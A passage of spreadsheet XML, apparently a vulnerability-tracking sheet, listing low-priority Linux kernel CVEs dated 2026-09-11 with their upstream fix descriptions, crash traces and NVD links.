      <c r="P973" s="5" t="inlineStr"/>
      <c r="Q973" s="5" t="inlineStr"/>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-wmi-sysman: Don't hex dump attribute security buffer
set_attribute() populates the security area of the BIOS attribute request
buffer with the current admin password via populate_security_buffer(), then
dumps the whole request buffer with print_hex_dump_bytes(). This can expose
the plaintext admin password in the kernel log.
The same issue was fixed for the password attribute path by
commit d1a196e0a6dc ("platform/x86: dell-wmi-sysman: Don't hex dump
plaintext password data"). Remove the remaining dump from the BIOS
attribute path.</t>
        </is>
      </c>
      <c r="S973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89444</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89446</t>
        </is>
      </c>
      <c r="D974" s="5" t="inlineStr"/>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="inlineStr"/>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr"/>
      <c r="Q974" s="5" t="inlineStr"/>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommufd: Release current IOAS on xa_store() failure
iommufd_take_all_iova_rwsem() takes an object reference and the
iova_rwsem write lock before storing the IOAS in the temporary ioas_list
xarray.
If xa_store() fails, the current IOAS has not been inserted into
ioas_list yet. iommufd_release_all_iova_rwsem() only unwinds IOAS
objects already present in that xarray, so it cannot release the current
IOAS.
Release the current IOAS rwsem and object reference before unwinding the
previously stored entries.</t>
        </is>
      </c>
      <c r="S974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89446</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89447</t>
        </is>
      </c>
      <c r="D975" s="5" t="inlineStr"/>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="inlineStr"/>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr"/>
      <c r="Q975" s="5" t="inlineStr"/>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommufd: Avoid locking internal accesses during unmap
iommufd_access_notify_unmap() skips internal accesses because they do
not have an external unmap callback to invoke.
However, the current test calls iommufd_lock_obj() before checking
whether the access is internal. If iommufd_lock_obj() succeeds, the loop
then sees the internal access and continues, bypassing the matching
iommufd_put_object() used by the normal unmap path. This leaks the
object reference taken by iommufd_lock_obj().
Check for internal accesses first so skipped entries are never locked.</t>
        </is>
      </c>
      <c r="S975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89447</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89449</t>
        </is>
      </c>
      <c r="D976" s="5" t="inlineStr"/>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="inlineStr"/>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr"/>
      <c r="Q976" s="5" t="inlineStr"/>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu: Fix dev_iommu memory leak when device_add fails in iommu_mock_device_add
iommu_mock_device_add() first calls iommu_fwspec_init(), which on
success allocates both dev-&gt;iommu (via dev_iommu_get()) and
dev-&gt;iommu-&gt;fwspec. If the subsequent device_add(dev) call fails,
the error path only calls iommu_fwspec_free(dev), which frees
fwspec but leaves dev-&gt;iommu still allocated.
This triggers the following kmemleak report when fuzzing with Syzkaller:
BUG: memory leak
unreferenced object 0xffff888011e0a200 (size 192):
  comm "syz.1.1695", pid 24885, jiffies 4295222527
  hex dump (first 32 bytes):
    00 00 00 00 00 00 00 00 00 00 00 00 ad 4e ad de  .............N..
    ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff  ................
  backtrace (crc 25df5bb3):
    kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]
    slab_post_alloc_hook mm/slub.c:4575 [inline]
    slab_alloc_node mm/slub.c:4899 [inline]
    __kmalloc_cache_noprof+0x47a/0x710 mm/slub.c:5415
    kmalloc_noprof include/linux/slab.h:950 [inline]
    kzalloc_noprof include/linux/slab.h:1188 [inline]
    dev_iommu_get+0x10c/0x1a0 drivers/iommu/iommu.c:408
    iommu_fwspec_init+0x288/0x4d0 drivers/iommu/iommu.c:3087
    iommu_mock_device_add+0x46/0xb0 drivers/iommu/iommu.c:385
    mock_dev_create drivers/iommu/iommufd/selftest.c:1025 [inline]
    iommufd_test_mock_domain drivers/iommu/iommufd/selftest.c:1066 [inline]
    iommufd_test+0x2f8a/0x6190 drivers/iommu/iommufd/selftest.c:2072
    iommufd_fops_ioctl+0x367/0x540 drivers/iommu/iommufd/main.c:533
    vfs_ioctl fs/ioctl.c:51 [inline]
    __do_sys_ioctl fs/ioctl.c:597 [inline]
    __se_sys_ioctl fs/ioctl.c:583 [inline]
    __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583
    do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
    do_syscall_64+0x116/0x800 arch/x86/entry/syscall_64.c:94
    entry_SYSCALL_64_after_hwframe+0x77/0x7f
Fix this by calling dev_iommu_free(dev) instead of iommu_fwspec_free(dev)
in the device_add() failure path. dev_iommu_free() frees both fwspec
and the outer dev_iommu struct and clears dev-&gt;iommu.</t>
        </is>
      </c>
      <c r="S976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89449</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89451</t>
        </is>
      </c>
      <c r="D977" s="5" t="inlineStr"/>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="inlineStr"/>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr"/>
      <c r="Q977" s="5" t="inlineStr"/>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/sva: Set handle-&gt;dev before the SVA handle is visible
iommu_attach_device_pasid() installs the new SVA attach handle in the
group PASID lookup before iommu_sva_bind_device() returns. A concurrent
bind can therefore find and reuse the same handle after iommu_sva_lock is
dropped.
handle-&gt;dev was initialized after dropping iommu_sva_lock. This leaves a
window where a racing bind can return a handle whose dev pointer is still
NULL. A subsequent iommu_sva_unbind_device() can then dereference it via
handle-&gt;dev-&gt;iommu_group.
Initialize handle-&gt;dev before releasing iommu_sva_lock so any visible SVA
handle is fully initialized.</t>
        </is>
      </c>
      <c r="S977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89451</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89453</t>
        </is>
      </c>
      <c r="D978" s="5" t="inlineStr"/>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="inlineStr"/>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr"/>
      <c r="Q978" s="5" t="inlineStr"/>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Put PCI device after handling PPR faults
iommu_call_iopf_notifier() looks up the requester with
pci_get_domain_bus_and_slot(), which returns a PCI device with its
reference count incremented.
Neither the successful iommu_report_device_fault() path nor the abort
path drops that reference, so every handled PPR request leaks a PCI
device reference.
This is the same ownership rule that was fixed for the old iommu_v2
ppr_notifier() path by commit 6cf0981c2233 ("iommu/amd: Fix pci device
refcount leak in ppr_notifier()"), but iommu_call_iopf_notifier() was
added later as a separate PPR/IOPF notifier path.
Drop the PCI device reference after handling the PPR entry.</t>
        </is>
      </c>
      <c r="S978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89453</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89454</t>
        </is>
      </c>
      <c r="D979" s="5" t="inlineStr"/>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="inlineStr"/>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr"/>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr"/>
      <c r="Q979" s="5" t="inlineStr"/>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: plda: Fix IRQ domain leaks in the error paths of plda_init_interrupts()
plda_init_interrupts() initializes IRQ domains and creates IRQ mapping but
does not unwind them when later step fails.
If platform_get_irq() or either irq_create_mapping() fails
in plda_init_interrupts(), the domains are never deinitialized. If
irq_create_mapping() fails, port-&gt;intx_irq stays initialized.
Hence, remove the IRQ domains in the error path by calling
plda_pcie_irq_domain_deinit().
Since plda_pcie_irq_domain_deinit() now disposes of the intx_irq and
msi_irq mappings itself before removing their domains, the msi_irq
mapping failure path can go directly to err_irq_domain_deinit instead of
disposing of port-&gt;intx_irq separately first.
This issue was found by automated review of sashiko-bot
[mani: commit log]</t>
        </is>
      </c>
      <c r="S979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89454</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89455</t>
        </is>
      </c>
      <c r="D980" s="5" t="inlineStr"/>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="inlineStr"/>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr"/>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr"/>
      <c r="Q980" s="5" t="inlineStr"/>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: plda: Fix use-after-free of event IRQs during teardown
plda_pcie_irq_domain_deinit() removes pcie-&gt;event_domain via
irq_domain_remove(), but the per-event IRQs mapped from that domain
are requested with devm_request_irq() in plda_init_interrupts(). The
actual free_irq() for a devm-managed IRQ is deferred by devres until
after the calling probe()/remove() function returns.
This means irq_domain_remove() can free the domain's internal data
before the deferred free_irq() for IRQs still mapped into it has run.
When devres later processes that deferred cleanup, it can end up
dereferencing the already-freed domain.
Free each event IRQ explicitly with devm_free_irq() before removing
the domain. This triggers the free immediately and removes the IRQ
from the devres tracking list, so devres will not attempt to free it
a second time later.
Also dispose of the event, INTx, and MSI IRQ mappings with
irq_dispose_mapping() before their owning domains are removed.
Finally, guard the calls to irq_set_chained_handler_and_data() for
pcie-&gt;irq, pcie-&gt;msi_irq, and pcie-&gt;intx_irq so they only run when
those fields hold a valid (&gt;0) IRQ number.
This is a pre-existing issue, flagged by automated review during work
on an earlier, unrelated patch to this driver.
Build-tested and boot-tested on StarFive VisionFive v1.2A board</t>
        </is>
      </c>
      <c r="S980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89455</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89457</t>
        </is>
      </c>
      <c r="D981" s="5" t="inlineStr"/>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="inlineStr"/>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr"/>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr"/>
      <c r="Q981" s="5" t="inlineStr"/>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/dasd: Guard sysfs discipline callbacks against unallocated private data
Several sysfs show/store handlers call a discipline callback that
dereferences device-&gt;private, either directly or through the
DASD_DEFINE_ATTR() macro. During dasd_generic_set_online() the discipline
is assigned before check_device() allocates device-&gt;private, so an
unprivileged read of one of these world-readable attributes in that window
dereferences a NULL pointer and panics.
Guard the dereference inside each callback that actually touches
device-&gt;private.</t>
        </is>
      </c>
      <c r="S981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89457</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89458</t>
        </is>
      </c>
      <c r="D982" s="5" t="inlineStr"/>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="inlineStr"/>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr"/>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr"/>
      <c r="Q982" s="5" t="inlineStr"/>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/dasd: Do not complete a failed ESE read as successful
dasd_int_handler() completes an NRF read of an unallocated ESE track by
calling ese_read() and unconditionally marking the request
DASD_CQR_SUCCESS. dasd_eckd_ese_read() can return an error before it has
zeroed the destination buffer: a failed sense-data parse or a current
track outside the requested range both return early, leaving the
destination pages untouched. The request is still completed successfully,
so the block layer is handed stale / uninitialized memory instead of
zeros.
Check the ese_read() return value and fail the request through the normal
error path instead of forcing DASD_CQR_SUCCESS.</t>
        </is>
      </c>
      <c r="S982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89458</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89460</t>
        </is>
      </c>
      <c r="D983" s="5" t="inlineStr"/>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="inlineStr"/>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr"/>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr"/>
      <c r="Q983" s="5" t="inlineStr"/>
      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/cpum_cf: Handle CPU hotplug via prepare/dead callbacks
The command 'perf stat -e cycles -- &lt;command&gt;' crashes the kernel
when CPUs are hotplug added during that run.
Root cause is the allocation of struct cpu_cf_events at first
event initialization. The allocation is dynamic and the first
event that has task context creates such a structure for
each online CPU. This is not sufficient. CPUs may be offline
during event creation and can be set online during the
perf run time. For example commands
 # echo 0 &gt; /sys/devices/system/cpu/cpu1/online
 # perf stat -e cycles -i -- stress-ng -t10s --matrix X
 # sleep 1
 # echo 1 &gt; /sys/devices/system/cpu/cpu1/online
create an event for CPUs 0,2-X. Since the events are created with
task-context, the scheduler will eventually schedule the program
on CPU1. This CPU has not created and initialized any per
CPU event infrastructure as that CPU was not online at the time
of the perf invocation. Thus when the scheduler runs stress-ng
on CPU1, the function cpumf_pmu_add() refers to a NULL pointer:
 struct cpu_cf_events *cpuhw = this_cpu_cfhw();
This function call is invoked after the task stress-ng has been
made runnable on CPU1. And this_cpu_cfhw() returns NULL.
The result is a panic:
Unable to handle kernel pointer dereference in virtual kernel address space
Failing address: 0000000000000000 TEID: 0000000000000483
....
Krnl PSW : 0404d00180000000 000003ef8291fd0c (cpumf_pmu_add+0x3c/0x80)
....
Call Trace:
 [&lt;000003ef8291fd0c&gt;] cpumf_pmu_add+0x3c/0x80
 [&lt;000003ef82bb5e3e&gt;] event_sched_in+0xae/0x190
 [&lt;000003ef82bb60d6&gt;] merge_sched_in+0x1b6/0x390
 [&lt;000003ef82bb65b8&gt;] visit_groups_merge.constprop.0.isra.0+0x308/0x5b0
 [&lt;000003ef82bb689a&gt;] pmu_groups_sched_in+0x3a/0x50
 [&lt;000003ef82bb6a30&gt;] ctx_sched_in+0x180/0x260
 [&lt;000003ef82bb780c&gt;] perf_event_context_sched_in+0x11c/0x2d0
 [&lt;000003ef82bb79ee&gt;] __perf_event_task_sched_in+0x2e/0xc0
 [&lt;000003ef82994834&gt;] finish_task_switch.isra.0+0x1a4/0x250
....
Last Breaking-Event-Address:
 [&lt;000003ef8291f1d8&gt;] this_cpu_cfhw+0x38/0x40
The issue arises only in per-task context when the CPUMF facility is
used and the scheduler picks a random CPU for such a process to run on.
The scheduler enables the CPUMF infrastructure via PMU callback
functions pmu::add() and pmu::del().
Introduce a CPU hotplug prepare/dead callback pair which creates and
removes the per CPU counter data while the CPU is offline. Count the
users which track every CPU (cpu == -1), that is perf_event_open()
events with task context and /dev/hwctr device sessions, in the new
counter cpu_cf_root::tskcnt, protected by pmc_reserve_mutex.
This ensures the infrastructure is available when
new CPU is selected to run the per-task context process.
In cpum_cf_free_root() and cpum_cf_free_cpu() ensure the reference
pointer to data structures is set to NULL before the data is freed
to prevent interrupt handlers to access stale data.
[gor@linux.ibm.com: change commit message]</t>
        </is>
      </c>
      <c r="S983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89460</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89461</t>
        </is>
      </c>
      <c r="D984" s="5" t="inlineStr"/>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="inlineStr"/>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr"/>
      <c r="L984" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr"/>
      <c r="Q984" s="5" t="inlineStr"/>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: max17040: synchronize work cancellation on suspend
max17040_work() requeues itself after every poll. cancel_delayed_work()
only cancels a pending instance and does not wait for a callback that is
already running.
If system suspend races with the polling callback, the callback can
continue accessing the fuel gauge and requeue itself after the suspend
callback returns.
Use cancel_delayed_work_sync() to ensure polling is quiesced before
suspend completes.</t>
        </is>
      </c>
      <c r="S984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89461</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89462</t>
        </is>
      </c>
      <c r="D985" s="5" t="inlineStr"/>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="inlineStr"/>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr"/>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr"/>
      <c r="Q985" s="5" t="inlineStr"/>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: max17040: propagate register read errors
max17040_get_vcell() and max17040_get_soc() ignore errors returned by
regmap_read().  When an I2C transfer fails, the uninitialized register
value is converted and reported to userspace as a valid voltage or state
of charge.  The polling worker can also replace the cached state of charge
with the bogus value and emit a spurious change event.
Propagate read errors through the power supply get_property callback and
keep the last valid cached state of charge when polling fails.</t>
        </is>
      </c>
      <c r="S985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89462</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89463</t>
        </is>
      </c>
      <c r="D986" s="5" t="inlineStr"/>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="inlineStr"/>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr"/>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr"/>
      <c r="Q986" s="5" t="inlineStr"/>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: ucs1002: fix use-after-free on remove
ucs1002 has no remove callback, so unbind runs entirely through devm.
The alert IRQ handler queues the health_poll delayed work, and the work
reschedules itself while the chip reports a bad-health condition.  devm
frees the alert IRQ, which only synchronizes the handler; it does not
cancel the delayed work, which can then run after devm frees the driver
data and dereference it.
Register health_poll with devm_delayed_work_autocancel() before the
alert IRQ is requested.  devm then frees the IRQ before cancelling the
work, so the handler can no longer queue it and the work is cancelled
before the driver data is freed.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89463</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89464</t>
        </is>
      </c>
      <c r="D987" s="5" t="inlineStr"/>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="inlineStr"/>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr"/>
